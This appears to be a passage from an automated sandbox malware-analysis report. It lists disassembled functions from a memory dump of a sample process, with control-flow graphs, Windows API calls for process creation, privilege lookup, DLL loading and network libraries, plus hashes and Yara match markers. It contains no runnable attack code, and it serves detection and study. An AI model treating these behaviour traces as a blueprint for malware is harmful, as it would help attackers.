                                                                                                                    • Opcode ID: 53bebdc2fa8e27df6120168b46003dbfba9d1353ba6734e4f23c144556009322
                                                                                                                    • Instruction ID: 73747647c265d83e8104a4eec02fe4ad06bccb1d32d74fa6994cfdc78e0b95f3
                                                                                                                    • Opcode Fuzzy Hash: 53bebdc2fa8e27df6120168b46003dbfba9d1353ba6734e4f23c144556009322
                                                                                                                    • Instruction Fuzzy Hash: 8B90023561550802D100B25C4554706104587D0201F65C411A0424968D87D69A5166A2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02949080 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 243 2949080-29490c2 call 294bd40 246 294919c-29491a2 243->246 247 29490c8-2949118 call 294be10 call 293acf0 call 2944e50 243->247 254 2949120-2949131 Sleep 247->254 255 2949196-294919a 254->255 256 2949133-2949139 254->256 255->246 255->254 257 2949163-2949184 call 2948eb0 256->257 258 294913b-2949161 call 2948ca0 256->258 261 2949189-294918c 257->261 258->261 261->255
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02949128
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: 795b43a4e30455ab9657b98569e92b401ee1749ed8d047564c68aae02d74f105
                                                                                                                    • Instruction ID: 58558b5e6a41bf62b71efd263d322c600c86f29bde60ce70ebb8fe97ffe0b3ce
                                                                                                                    • Opcode Fuzzy Hash: 795b43a4e30455ab9657b98569e92b401ee1749ed8d047564c68aae02d74f105
                                                                                                                    • Instruction Fuzzy Hash: 9F316FB2900644BBD724DF64C885F67B7B9FB88B04F10851DF62A6B245DB30B650CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02949079 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 79sleepCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 263 2949079-29490af 264 29490bb-29490c2 263->264 265 29490b6 call 294bd40 263->265 266 294919c-29491a2 264->266 267 29490c8-2949118 call 294be10 call 293acf0 call 2944e50 264->267 265->264 274 2949120-2949131 Sleep 267->274 275 2949196-294919a 274->275 276 2949133-2949139 274->276 275->266 275->274 277 2949163-2949184 call 2948eb0 276->277 278 294913b-2949161 call 2948ca0 276->278 281 2949189-294918c 277->281 278->281 281->275
                                                                                                                    APIs
                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 02949128
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Sleep
                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                    • Opcode ID: 9cb59c965b7988437cd93bb258484d8f04bf3ab432ae8fa70a2d4ecb4f50caba
                                                                                                                    • Instruction ID: dd928d070403ef0f1a399ce3736776ff179e319d16505fef947ae1d8e1d4eca9
                                                                                                                    • Opcode Fuzzy Hash: 9cb59c965b7988437cd93bb258484d8f04bf3ab432ae8fa70a2d4ecb4f50caba
                                                                                                                    • Instruction Fuzzy Hash: 9821A0B1900304ABD714DF64C885FABB7B9FB88B04F10805DEA2D6B245DB70A550CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A670 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 295 294a670-294a6a1 call 294af60 RtlFreeHeap
                                                                                                                    APIs
                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02933AF8), ref: 0294A69D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeHeap
                                                                                                                    • String ID: .z`
                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                    • Instruction ID: 2fb91da42a3c41764a7ac1381c9d7d6875be6649763288cd0400ec7cd035626d
                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                    • Instruction Fuzzy Hash: F3E04FB12002086FD714DF59CC44EA777ADEF88750F118554FD0857241C630F910CAF0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02938393 Relevance: 3.2, APIs: 2, Instructions: 198threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 7416500e4b44442400f7a0b99e30bf09c2cdf1a80db45bdcaac8482a180589f8
                                                                                                                    • Instruction ID: 96bb5b86deb8186fbc6c376fca36452ee6df10b06aa248ec5de9adb2e33ecb22
                                                                                                                    • Opcode Fuzzy Hash: 7416500e4b44442400f7a0b99e30bf09c2cdf1a80db45bdcaac8482a180589f8
                                                                                                                    • Instruction Fuzzy Hash: B261A2B1901209AFDB25DF64DC89FABB7A9FB44718F00056DF90DA7240DB70AA058FA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0293830A Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 6b4bfee01f0f0ae585d7910d12e9e959c201465b44a42121ed5ee2ee7945086b
                                                                                                                    • Instruction ID: 5b438846d3f65b00f0e352332529ea728e8043ece8b509922cbaaa62711beb9e
                                                                                                                    • Opcode Fuzzy Hash: 6b4bfee01f0f0ae585d7910d12e9e959c201465b44a42121ed5ee2ee7945086b
                                                                                                                    • Instruction Fuzzy Hash: D301AC31A8122977EB21AA949C42FFF771D5F81B54F040155FF04BF1C1EBA4690647E5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 02938310 Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0293836A
                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0293838B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: MessagePostThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1836367815-0
                                                                                                                    • Opcode ID: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                                                                                    • Instruction ID: a2edbd2a70fec983f1981bfd0109c9d440ac4f56ed2108ffe5b4bf8390d95bd1
                                                                                                                    • Opcode Fuzzy Hash: 9e70c73f60def60f65b4c435396576adf58625eb4223d803369717d0cef32593
                                                                                                                    • Instruction Fuzzy Hash: 0501A731A8122877E721AA949C42FBF776D6B80F54F040115FF04BA1C1EAA4690647F6
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0293ACF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 587 293acf0-293ad19 call 294cc50 590 293ad1b-293ad1e 587->590 591 293ad1f-293ad2d call 294d070 587->591 594 293ad2f-293ad3a call 294d2f0 591->594 595 293ad3d-293ad4e call 294b4a0 591->595 594->595 600 293ad50-293ad64 LdrLoadDll 595->600 601 293ad67-293ad6a 595->601 600->601
                                                                                                                    APIs
                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0293AD62
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Load
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2234796835-0
                                                                                                                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                    • Instruction ID: 0904eb97d8b4c27da7556cb613021c8dd3a7f9f43db5de0311de713a851837d0
                                                                                                                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                                                                                    • Instruction Fuzzy Hash: 78011EB5E0020DABDF10DAE4DC41F9DB3799F54308F004695E91897241FA31E7148B91
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A7C4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 602 294a7c4-294a7c7 603 294a751-294a774 call 294af60 602->603 604 294a7c9-294a7e9 602->604 605 294a7ef-294a804 LookupPrivilegeValueW 604->605 606 294a7ea call 294af60 604->606 606->605
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0293F1D2,0293F1D2,?,00000000,?,?), ref: 0294A800
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: 09c3ba8b1e811f308a588f7e4d6dc55410958d9fef804bb287468e310d9b3128
                                                                                                                    • Instruction ID: cf8c7508b67b06fbfbe88cf9695df48e35dc360f1ceabfc97b66bdc8c59d3633
                                                                                                                    • Opcode Fuzzy Hash: 09c3ba8b1e811f308a588f7e4d6dc55410958d9fef804bb287468e310d9b3128
                                                                                                                    • Instruction Fuzzy Hash: F3016DB2600104AFDB24EF58DC40EEB376DEF84354F118554FD0C97241CA35E8118BB4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A6DD Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0294A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2186235152-0
                                                                                                                    • Opcode ID: affcd83f44376a3705b5f70d1c6c69b8dc6891aa4f52d4192795058a8665a0f2
                                                                                                                    • Instruction ID: 16c7c956aec881767014986b122b21f8dce694ce276af252ec9114e56ad248fe
                                                                                                                    • Opcode Fuzzy Hash: affcd83f44376a3705b5f70d1c6c69b8dc6891aa4f52d4192795058a8665a0f2
                                                                                                                    • Instruction Fuzzy Hash: 7B01BBB6210108BFCB54DF99DC90DEB37ADAF8C754F158258FA0D97240D630E851CBA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A6E0 Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0294A734
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2186235152-0
                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                    • Instruction ID: 6bbe0eac6357fe92baad4cf11d66ba49257b27f2f86382da72e60690fca09ae6
                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                    • Instruction Fuzzy Hash: DC01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0D97240C630E851CBA4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 029491B0 Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0293F050,?,?,00000000), ref: 029491EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateThread
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2422867632-0
                                                                                                                    • Opcode ID: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                                                                                    • Instruction ID: 637a9282f982c9bb52f9000002d4b647346ec52afd636bf34931a27194fcb679
                                                                                                                    • Opcode Fuzzy Hash: ecacb28e533d931049fcac73acfce2faf05e3b67876ae05ce95fa90aefa457bb
                                                                                                                    • Instruction Fuzzy Hash: B4E092373803043AE7306599AC02FA7B39CCBC1B20F150026FA0DEB2C0D995F40146E4
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(02944536,?,02944CAF,02944CAF,?,02944536,?,?,?,?,?,00000000,00000000,?), ref: 0294A65D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                    • Instruction ID: 54ee852f0635896b93889032a800a7b9636f168a6caf34d2488195aaeb8345d6
                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                    • Instruction Fuzzy Hash: 26E012B2200208ABDB14EF99CC40EA777ADEF88654F118598BE085B241CA30F9118AB0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0294A7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0293F1D2,0293F1D2,?,00000000,?,?), ref: 0294A800
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3899507212-0
                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                    • Instruction ID: 8cf92fbbeb15203d8c290ef2c7ae8a919f0e813b3ecef8d480191e7bc44ec00d
                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                    • Instruction Fuzzy Hash: 64E01AB12002086BDB10DF49CC84EE737ADEF88650F118164BE0857241C930E8118BF5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0293F6C8 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,02938D14,?), ref: 0293F6FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: ccb654493a25921728d5c4471a47a0bbc452baec57feb778658e501a848c7b22
                                                                                                                    • Instruction ID: ce26440f0bc6747729f9d9faa027a3092c174908d1134206fd0a7b986e95c323
                                                                                                                    • Opcode Fuzzy Hash: ccb654493a25921728d5c4471a47a0bbc452baec57feb778658e501a848c7b22
                                                                                                                    • Instruction Fuzzy Hash: B8E0C272A803083AE710EAB49C02F5A67895B90704F190068F949DB3C3EA94D0014610
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0293F6D0 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,02938D14,?), ref: 0293F6FB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3821296806.0000000002930000.00000040.80000000.00040000.00000000.sdmp, Offset: 02930000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_2930000_help.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2340568224-0
                                                                                                                    • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                    • Instruction ID: be9757f90d0c5c43bca975b772cc8976ccfd508ccf024a8fdf646651b5d987dc
                                                                                                                    • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                                                                                    • Instruction Fuzzy Hash: 48D05E616503082AE610AAA49C02F27328D9B44B04F490064F948962C3DD60E0004565
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03332C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InitializeThunk
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2994545307-0
                                                                                                                    • Opcode ID: 4c3629ac8a2b631db6f4a2eb2678f6e271f72c41648a2b472b3a353a6ecf4c97
                                                                                                                    • Instruction ID: e6f7326cdb22f973a4fb43fc5ab6381393b04e59f3c4c6daf6528ef7da1ed6d5
                                                                                                                    • Opcode Fuzzy Hash: 4c3629ac8a2b631db6f4a2eb2678f6e271f72c41648a2b472b3a353a6ecf4c97
                                                                                                                    • Instruction Fuzzy Hash: A0B09B719015C5C5DA11F7644A48717794467D1701F19C461D2034741F4779D1D1E275
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Non-executed Functions

                                                                                                                    Function 03332890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    • Opcode ID: 6daaead5d0ab2adaf2090e6619efc6d29bbdd7ddfc7e08d0101592592fa81317
                                                                                                                    • Instruction ID: 205d4602059e0d3ef8807e614109455059b1cb1c10f9824f525f3a0da922da64
                                                                                                                    • Opcode Fuzzy Hash: 6daaead5d0ab2adaf2090e6619efc6d29bbdd7ddfc7e08d0101592592fa81317
                                                                                                                    • Instruction Fuzzy Hash: 0D51D3B6A00256AFCB10DFA8CCD097FF7BCBB09201754C669E5A5D7645D234EE508BE0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 033A2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ___swprintf_l
                                                                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                    • API String ID: 48624451-2108815105
                                                                                                                    • Opcode ID: a542248ba5262217d66c09a20036960ebd72ce8af7a5f6a7374a1cec3fa1e6db
                                                                                                                    • Instruction ID: 85b89da1cee8f5d26e8491505556a8f264d1f75781547897d298eb189e49e1ee
                                                                                                                    • Opcode Fuzzy Hash: a542248ba5262217d66c09a20036960ebd72ce8af7a5f6a7374a1cec3fa1e6db
                                                                                                                    • Instruction Fuzzy Hash: 4751E7B5A04A45AECB34DF5CCCD097FF7FDEB44200B488899E595D7641E774EA408760
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 03327630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 033646FC
                                                                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03364742
                                                                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03364655
                                                                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 03364787
                                                                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03364725
                                                                                                                    • ExecuteOptions, xrefs: 033646A0
                                                                                                                    • Execute=1, xrefs: 03364713
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.3825638089.00000000032C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032C0000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.00000000033ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000004.00000002.3825638089.000000000345E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_32c0000_help.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                    • API String ID: 0-484625025
